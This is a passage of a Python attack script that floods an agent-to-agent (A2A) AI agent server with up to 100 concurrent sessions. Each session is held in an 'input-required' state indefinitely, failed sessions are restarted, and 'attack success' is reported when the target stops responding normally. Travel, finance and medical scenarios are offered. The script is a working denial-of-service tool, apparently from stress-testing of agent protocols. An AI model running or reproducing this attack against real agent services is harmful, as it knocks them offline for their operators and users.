            session_data["in_input_required"] = True
            
            return True
        return False
    
    async def maintain_input_required_state(self, client: httpx.AsyncClient, session_data: Dict):
        """Maintain input-required state"""
        session_id = session_data["session_id"]
        
        if session_id not in self.input_required_sessions:
            return
        
        state_info = self.input_required_sessions[session_id]
        
        # In continuous mode, maintain state forever
        if self.config.continuous_mode:
            # Send lightweight continue request to maintain state
            scenario_name = self.config.scenario.value.lower()
            continue_query = f"Continue processing {scenario_name} search for session {session_id}, request #{session_data['request_count']}"
            
            session_data["request_count"] += 1
            
            # Send continue request without ending input-required state
            result = await self.send_a2a_request(client, {
                **session_data,
                "query_override": continue_query
            })
            
            if result and not result.get("error"):
                print(f"🔄 Session {session_id} maintaining input-required state (request #{session_data['request_count']})")
            
            # Reset hold time to maintain permanently
            state_info["hold_until"] = time.time() + self.config.input_required_hold_time
        else:
            # Original time-limited logic
            if time.time() < state_info["hold_until"]:
                scenario_name = self.config.scenario.value.lower()
                continue_query = f"Continue with the {scenario_name} search for session {session_id}"
                session_data["request_count"] += 1
                
                result = await self.send_a2a_request(client, {
                    **session_data,
                    "query_override": continue_query
                })
                
                if result and not result.get("error"):
                    print(f"🔄 Session {session_id} maintaining input-required state")
            else:
                print(f"⏰ Session {session_id} releasing input-required state")
                self.metrics.concurrent_input_required_states -= 1
                del self.input_required_sessions[session_id]
                session_data["in_input_required"] = False
    
    async def continuous_pressure_session(self, session_id: str):
        """Continuous pressure test session"""
        client = await self.create_http_client()
        
        session_data = {
            "session_id": session_id,
            "context_id": str(uuid.uuid4()),
            "task_id": None,
            "request_count": 0,
            "in_input_required": False,
            "consecutive_failures": 0
        }
        
        with self.session_lock:
            self.active_sessions[session_id] = session_data
        
        try:
            while self.attack_active and not self.shutdown_requested:
                # If already in input-required state, maintain it
                if session_data.get("in_input_required"):
                    await self.maintain_input_required_state(client, session_data)
                else:
                    # Send new request to try triggering input-required
                    session_data["request_count"] += 1
                    result = await self.send_a2a_request(client, session_data)
                    
                    if result and not result.get("error"):
                        # Check if input-required state was triggered
                        await self.handle_input_required_state(session_data, result)
                        
                        session_data["consecutive_failures"] = 0
                        print(f"📨 Session {session_id} sent request {session_data['request_count']}: Success")
                    elif result and result.get("error"):
                        session_data["consecutive_failures"] += 1
                        error_msg = result["error"]
                        print(f"❌ Session {session_id} request failed: {error_msg}")
                        
                        # If too many consecutive failures, take a short break
                        if session_data["consecutive_failures"] >= 10:
                            print(f"⚠️ Session {session_id} failed {session_data['consecutive_failures']} times consecutively, pausing for {self.config.failed_session_restart_delay}s")
                            await asyncio.sleep(self.config.failed_session_restart_delay)
                            session_data["consecutive_failures"] = 0
                
                # Check if session restart is needed
                if (self.config.session_restart_threshold > 0 and 
                    session_data["request_count"] >= self.config.session_restart_threshold):
                    print(f"🔄 Session {session_id} reached {self.config.session_restart_threshold} requests, restarting session")
                    # Reset session
                    session_data["context_id"] = str(uuid.uuid4())
                    session_data["task_id"] = None
                    session_data["request_count"] = 0
                    session_data["in_input_required"] = False
                    
                    # Clean up input-required state if exists
                    if session_id in self.input_required_sessions:
                        del self.input_required_sessions[session_id]
                        self.metrics.concurrent_input_required_states -= 1
                
                # Minimum request interval
                await asyncio.sleep(self.config.min_request_interval)
                
        except Exception as e:
            print(f"❌ Session {session_id} exception: {e}")
        finally:
            await client.aclose()
            with self.session_lock:
                if session_id in self.active_sessions:
                    del self.active_sessions[session_id]
            
            # Clean up input-required state
            if session_id in self.input_required_sessions:
                del self.input_required_sessions[session_id]
                self.metrics.concurrent_input_required_states -= 1
    
    async def metrics_reporter(self):
        """Metrics reporter"""
        while self.attack_active and not self.shutdown_requested:
            await asyncio.sleep(self.config.metrics_interval)
            
            elapsed_time = time.time() - self.attack_start_time
            
            print(f"\n📊 Continuous Pressure Test Metrics Report (Runtime: {elapsed_time:.1f}s)")
            print(f"Scenario: {self.config.scenario.value}")
            print(f"Total Requests: {self.metrics.total_requests}")
            print(f"Successful Requests: {self.metrics.successful_requests}")
            print(f"Failed Requests: {self.metrics.failed_requests}")
            print(f"Success Rate: {(self.metrics.successful_requests/max(self.metrics.total_requests,1)*100):.1f}%")
            print(f"Input-Required Triggered: {self.metrics.input_required_triggered}")
            print(f"Current Concurrent Input-Required States: {self.metrics.concurrent_input_required_states}")
            print(f"Max Concurrent Input-Required States: {self.metrics.max_concurrent_states}")
            print(f"Internal Errors (-32603): {self.metrics.internal_errors}")
            print(f"Connection Refused Count: {self.metrics.connection_refused_count}")
            print(f"Timeout Count: {self.metrics.timeout_count}")
            print(f"Server Overload Indicators: {self.metrics.server_overload_indicators}")
            print(f"Average Response Time: {self.metrics.get_avg_response_time():.2f}ms")
            print(f"P95 Response Time: {self.metrics.get_p95_response_time():.2f}ms")
            print(f"Active Sessions: {len(self.active_sessions)}")
            
            # Attack success detection metrics
            if self.attack_test_active:
                success_rate = (self.metrics.attack_success_count / max(self.metrics.attack_success_tests, 1)) * 100
                print(f"🎯 Attack Success Tests: {self.metrics.attack_success_tests}")
                print(f"🎯 Attack Success Count: {self.metrics.attack_success_count}")
                print(f"🎯 Attack Success Rate: {success_rate:.1f}%")
            
            if self.metrics.error_codes:
                print("Error Code Distribution:")
                for code, count in self.metrics.error_codes.items():
                    print(f"  {code}: {count}")
            
            # Server pressure assessment
            if self.metrics.total_requests > 0:
                failure_rate = self.metrics.failed_requests / self.metrics.total_requests
                if failure_rate > 0.5:
                    print("🔥 Server Pressure Status: High Pressure (Failure Rate > 50%)")
                elif failure_rate > 0.2:
                    print("⚠️ Server Pressure Status: Medium Pressure (Failure Rate > 20%)")
                else:
                    print("✅ Server Pressure Status: Normal")
                    
                if self.metrics.server_overload_indicators > 10:
                    print("💥 Server overload indicators detected!")
            
            print("-" * 80)
    
    async def execute_continuous_pressure_attack(self):
        """Execute continuous pressure test attack"""
        print("🚀 Starting A2A Continuous Input-Required State Occupation Pressure Test Attack")
        print(f"Target: {self.base_url}")
        print(f"Scenario: {self.config.scenario.value}")
        print(f"Max Concurrent Sessions: {self.config.max_concurrent_sessions}")
        print(f"Ramp-up Duration: {self.config.ramp_up_duration}s")
        print(f"Mode: {'Continuous Mode (until manually stopped)' if self.config.continuous_mode else 'Timed Mode'}")
        print(f"Input-Required Hold Time: {self.config.input_required_hold_time}s")
        print(f"Attack Success Detection: Starts after {self.config.attack_test_start_time}s, tests every {self.config.attack_test_interval}s")
        print("Press Ctrl+C to stop attack")
        
        self.attack_start_time = time.time()
        self.attack_active = True
        
        tasks = []
        
        # Start metrics reporter
        tasks.append(asyncio.create_task(self.metrics_reporter()))
        
        # Start attack success monitor
        tasks.append(asyncio.create_task(self.attack_success_monitor()))
        
        # Phase 1: Pressure Ramp Up
        print(f"\n🔥 Phase 1: Pressure Ramp Up ({self.config.ramp_up_duration}s)")
        ramp_up_start = time.time()
        
        session_counter = 0
        while time.time() - ramp_up_start < self.config.ramp_up_duration and not self.shutdown_requested:
            elapsed = time.time() - ramp_up_start
            intensity = elapsed / self.config.ramp_up_duration
            current_sessions = int(self.config.max_concurrent_sessions * intensity)
            
            # Start new sessions to reach target count
            active_session_count = len([t for t in tasks if not t.done()]) - 2  # -2 for metrics reporter and attack monitor
            while active_session_count < current_sessions and not self.shutdown_requested:
                session_counter += 1
                session_id = f"continuous_session_{session_counter:04d}"
                task = asyncio.create_task(
                    self.continuous_pressure_session(session_id)
                )
                tasks.append(task)
                print(f"🚀 Starting continuous pressure session {session_id} (intensity: {intensity:.2f})")
                await asyncio.sleep(0.2)
                active_session_count += 1
            
            await asyncio.sleep(1)
        
        # Phase 2: Sustained Maximum Pressure
        if not self.shutdown_requested:
            print(f"\n💥 Phase 2: Sustained Maximum Pressure Mode")
            
            # Ensure maximum concurrency is reached
            active_session_count = len([t for t in tasks if not t.done()]) - 2
            while active_session_count < self.config.max_concurrent_sessions and not self.shutdown_requested:
                session_counter += 1
                session_id = f"continuous_session_{session_counter:04d}"
                task = asyncio.create_task(
                    self.continuous_pressure_session(session_id)
                )
                tasks.append(task)
                print(f"🚀 Starting continuous pressure session {session_id}")
                await asyncio.sleep(0.1)
                active_session_count += 1
            
            # In continuous mode, keep sessions running until manually stopped
            if self.config.continuous_mode:
                print("🔄 Entering continuous pressure mode, will run until manually stopped...")
                
                # Monitor and restart failed sessions
                while not self.shutdown_requested:
                    await asyncio.sleep(5)
                    
                    # Check and restart completed sessions
                    active_tasks = [t for t in tasks if not t.done()]
                    active_session_count = len(active_tasks) - 2  # -2 for metrics reporter and attack monitor
                    
                    if active_session_count < self.config.max_concurrent_sessions:
                        needed_sessions = self.config.max_concurrent_sessions - active_session_count
                        print(f"🔧 Detected {needed_sessions} failed sessions, restarting...")
                        
                        for _ in range(needed_sessions):
                            if self.shutdown_requested:
                                break
                            session_counter += 1
                            session_id = f"continuous_session_{session_counter:04d}"
                            task = asyncio.create_task(
                                self.continuous_pressure_session(session_id)
                            )
                            tasks.append(task)
                            await asyncio.sleep(0.1)
        
        # Shutdown phase
        print(f"\n📉 Shutting down all sessions...")
        self.attack_active = False
        
        # Wait for all tasks to complete
        print("⏳ Waiting for all sessions to complete...")
        await asyncio.gather(*tasks, return_exceptions=True)
        
        # Final report
        total_time = time.time() - self.attack_start_time
        print(f"\n🎯 Attack completed! Total time: {total_time:.1f}s")
        print(f"📈 Final Statistics:")
        print(f"  Scenario: {self.config.scenario.value}")
        print(f"  Total Requests: {self.metrics.total_requests}")
        print(f"  Success Rate: {(self.metrics.successful_requests/max(self.metrics.total_requests,1)*100):.1f}%")
        print(f"  Input-Required Triggered: {self.metrics.input_required_triggered}")
        print(f"  Max Concurrent Input-Required States: {self.metrics.max_concurrent_states}")
        print(f"  Internal Errors: {self.metrics.internal_errors}")
        print(f"  Connection Refused Count: {self.metrics.connection_refused_count}")
        print(f"  Timeout Count: {self.metrics.timeout_count}")
        print(f"  Server Overload Indicators: {self.metrics.server_overload_indicators}")
        print(f"  Average Response Time: {self.metrics.get_avg_response_time():.2f}ms")
        
        # Attack success detection final results
        if self.metrics.attack_success_tests > 0:
            success_rate = (self.metrics.attack_success_count / self.metrics.attack_success_tests) * 100
            print(f"🎯 Attack Success Detection Results:")
            print(f"  Total Tests: {self.metrics.attack_success_tests}")
            print(f"  Successful Attacks: {self.metrics.attack_success_count}")
            print(f"  Attack Success Rate: {success_rate:.1f}%")
            
            if self.metrics.attack_success_count > 0:
                print("🏆 ATTACK EFFECTIVENESS: Target node showed signs of stress/inability to respond normally")
            else:
                print("🛡️ ATTACK EFFECTIVENESS: Target node maintained normal operation")
        
        # Save detailed report
        report = {
            "attack_config": {
                "scenario": self.config.scenario.value,
                "max_concurrent_sessions": self.config.max_concurrent_sessions,
                "total_duration": total_time,
                "continuous_mode": self.config.continuous_mode,
                "input_required_hold_time": self.config.input_required_hold_time,
                "attack_test_start_time": self.config.attack_test_start_time,
                "attack_test_interval": self.config.attack_test_interval
            },
            "metrics": {
                "total_requests": self.metrics.total_requests,
                "successful_requests": self.metrics.successful_requests,
                "failed_requests": self.metrics.failed_requests,
                "success_rate": self.metrics.successful_requests/max(self.metrics.total_requests,1)*100,
                "input_required_triggered": self.metrics.input_required_triggered,
                "max_concurrent_input_required": self.metrics.max_concurrent_states,
                "internal_errors": self.metrics.internal_errors,
                "connection_refused_count": self.metrics.connection_refused_count,
                "timeout_count": self.metrics.timeout_count,
                "server_overload_indicators": self.metrics.server_overload_indicators,
                "avg_response_time_ms": self.metrics.get_avg_response_time(),
                "p95_response_time_ms": self.metrics.get_p95_response_time(),
                "error_distribution": dict(self.metrics.error_codes),
                "attack_success_tests": self.metrics.attack_success_tests,
                "attack_success_count": self.metrics.attack_success_count,
                "attack_success_rate": (self.metrics.attack_success_count / max(self.metrics.attack_success_tests, 1)) * 100
            }
        }
        
        report_filename = f"continuous_pressure_test_report_{self.config.scenario.value.lower()}_{int(time.time())}.json"
        with open(report_filename, 'w', encoding='utf-8') as f:
            json.dump(report, f, indent=2, ensure_ascii=False)
        
        print(f"📄 Detailed report saved to: {report_filename}")

def parse_arguments():
    """Parse command line arguments"""
    parser = argparse.ArgumentParser(description='A2A Input-Required State Occupation Attack with Success Detection')
    parser.add_argument('-s', '--scenario', choices=['Travel', 'Finance', 'Medical'], 
                       default='Travel', help='Attack scenario (default: Travel)')
    parser.add_argument('--host', default='localhost', help='Target host (default: localhost)')
    parser.add_argument('--port', type=int, default=10001, help='Target port (default: 10001)')
    parser.add_argument('--sessions', type=int, default=100, help='Max concurrent sessions (default: 100)')
    parser.add_argument('--rampup', type=int, default=30, help='Ramp-up duration in seconds (default: 30)')
    parser.add_argument('--test-start', type=int, default=60, help='Start attack success testing after N seconds (default: 60)')
    parser.add_argument('--test-interval', type=int, default=30, help='Attack success test interval in seconds (default: 30)')
    
    return parser.parse_args()

async def main():
    """Main function"""
    args = parse_arguments()
    
    # Convert scenario string to enum
    scenario_map = {
        'Travel': ScenarioType.TRAVEL,
        'Finance': ScenarioType.FINANCE,
        'Medical': ScenarioType.MEDICAL
    }
    
    config = AttackConfig(
        target_host=args.host,
        target_port=args.port,
        scenario=scenario_map[args.scenario],
        max_concurrent_sessions=args.sessions,
        ramp_up_duration=args.rampup,
        attack_test_start_time=args.test_start,
        attack_test_interval=args.test_interval,
        continuous_mode=True,
        max_input_required_per_session=-1,
        input_required_hold_time=3600,
        request_timeout=3.0,
        min_request_interval=0.01,
        metrics_interval=15,
        session_restart_threshold=2000,
        failed_session_restart_delay=2.0
    )
    
    attacker = A2AInputRequiredStateOccupationAttacker(config)
    await attacker.execute_continuous_pressure_attack()

if __name__ == "__main__":
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        print("\n🛑 Attack interrupted by user")
    except Exception as e:
        print(f"❌ Attack execution failed: {e}")